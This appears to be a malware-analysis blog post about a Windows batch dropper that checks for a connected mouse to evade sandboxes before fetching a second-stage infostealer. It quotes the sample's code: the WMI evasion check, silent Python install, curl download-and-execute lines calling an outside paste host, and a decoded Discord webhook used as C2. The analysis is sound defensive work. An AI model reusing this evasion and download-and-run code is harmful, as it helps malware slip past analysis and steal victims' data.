Malware samples have plenty of techniques to detect if they are running in a "safe" environment. By safe, I mean a normal computer with a user between the keyboard and the chair, programs running, etc. These techniques are based on checking the presence of specific processes, registry keys, or files. The hardware can also be a good indicator (are some devices present or not?)
Some techniques rely on basic checks that can be easily implemented in a simple Windows script (.bat) file. I found an interesting one that performs a basic check before downloading the next payload. The file has the following SHA256 hash: 460f956ecb4b54518be32f2e48930187356301013448e36414c2fb0a1815a2cb[1]
set "mouseConnected=false" for /f "tokens=2 delims==" %%I in ('wmic path Win32_PointingDevice get PNPDeviceID /value ^| find "PNPDeviceID"') do ( set "mouseConnected=true" ) if not !mouseConnected! == true ( exit /b 1 )
The script uses the WMI ("Windows Management Instrumentation") client to query the hardware and filter interesting devices. Here is an output generated on a regular computer:
C:\Users\REM\Desktop>wmic path Win32_PointingDevice get PNPDeviceID /value PNPDeviceID=ACPI\PNP0F13\4&1BD7F811&0 PNPDeviceID=USB\VID_0E0F&PID_0003&MI_01\7&12E62A01&0&0001 PNPDeviceID=USB\VID_0E0F&PID_0003&MI_00\7&12E62A01&0&0000
Indeed some basic sandboxes do not have a mouse connected to them. Easy trick! Note that, in a lot of organizations, access to the "wmic" tool is prohibited for normal users because it can be used to perform a lot of sensitive actions.
If no mouse is detected, the script will fetch its copy of a minimal Python environment and install it:
set "eee=https://www.python.org/ftp/python/3.10.0/python-3.10.0rc2-amd64.exe" set "eeee=python-installer.exe" curl -L -o !eeee! !eee! --insecure --silent start /wait !eeee! /quiet /passive InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0 > NUL 2>&1 del !eeee!
Finally, it will download and execute the second stage:
set "ENCODED_URL=hxxps://rentry[.]co/zph33gvz/raw set "OUTPUT_FILE=webpage.py" curl -o %OUTPUT_FILE% -s %ENCODED_URL% --insecure if %ERRORLEVEL% neq 0 ( echo Error: Failed to download the webpage. exit /b 1 ) python -m %OUTPUT_FILE% del %OUTPUT_FILE%
The second stage is another InfoStealer. Nothing special except the way the DIscord channel used as C2 is obfuscated:
webhook = b'\xc8~~\xc9(T>>\x10\x1e(\x82=\xa1\x10\x95\x82=$>\xbc\xc9\x1e>lM1\xc8=={(>\xb08-Z-\xb3-\x8b8\x8b\x1b\xb0\xb3\xb0\xb08\x87Z\x8b>\xf91\xe0f&\x82g\xe0\xa7g\x98\xf0Y\xd60\xcdX\xb4\xb4\xfe\xa6\xc9\xc9l~Y(g\xf8\x1c&\x82\xd6Nf\x87e\xe0\xf7)\xf70e_,8\xfe\xa6Z\x1c\xe28M\xaf_\xc6,1E\xf7N_\xf2,_\x1b\ne',b'x.\x8d\\V+\xb1c\x94\x9cw\xb5\x8c\t]\x12\r\x91[5y\x8a\x15L\xe5Bq\xd0\xa5\x0c\xd9\xe8\x9f\xdd\x93J\xd4\x88\xb8\x84\xa3K\x02\x0f\xa8E\x95>-\xb08\x87\x8b\x1b\xb3\xf2\x18ZTG\x16\xb2i\xcf\x11\xb4\xf7\x07\x1cuOY\xcd\xe0_,m&\xf0\xaaX\xfeW\xaf\x90\xf9\xc6\xae\xf8\x08\n\x7f\xab\x014e\x9a\xbc1\x82\x10M)f\xc8\x1e\xd6{g$\xe2=\xc9\x98\xa1(~N\xc5l\xa6\xa70\xba/\x053\xb6b\xfd"\xde\xa4h\x9bId\xc1\xc4\xb9\x96\xf3\x83\x06\xbd2H\xc7\xc0\xd5z\xa0\x99ao\xef\x13r\x1dP7\x14v\xa2\xeek\xeb\xe1\xbf9}:R\xe7\'\xbb<DQ\x9e^\xfc\xad%\x8e\x1f\x97\xc2U\x19\x86\x17\x81\xff\xea\xfa\x9dF\xa9p!\xcc#\xc3C\x85\xdc|\xf5j;\xbeA\xec\xe4\x80\xd2\xf4S\xb7\xdb\xe9\x89\xcb\xd76\x0b\xe3`@\x92\x03\xf1s\xfbn\xf6\xd1\xda\xd3\x0e\xd8t\x00\x8f\xed\xe6\xac \xdf\x04\xca?*\x1a\xce'
Is it decrypted using this simple function:
def DeobfuscateWeb(encrypted_text, key): decrypted = [0] * 256 for i, char in enumerate(key): decrypted[char] = i decrypted_text = [] for char in encrypted_text: decrypted_char = decrypted[char] decrypted_text.append(decrypted_char) return bytes(decrypted_text)
and returns "hxxps://discord[.]com/api/webhooks/1209060424516112394/UbIgMclIylqNGjzHPAAQxppwtGslXDMcjug3_IBfBz_JK2Qx9Dn2eSJVKb-BuJ7KJ5Z_"
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key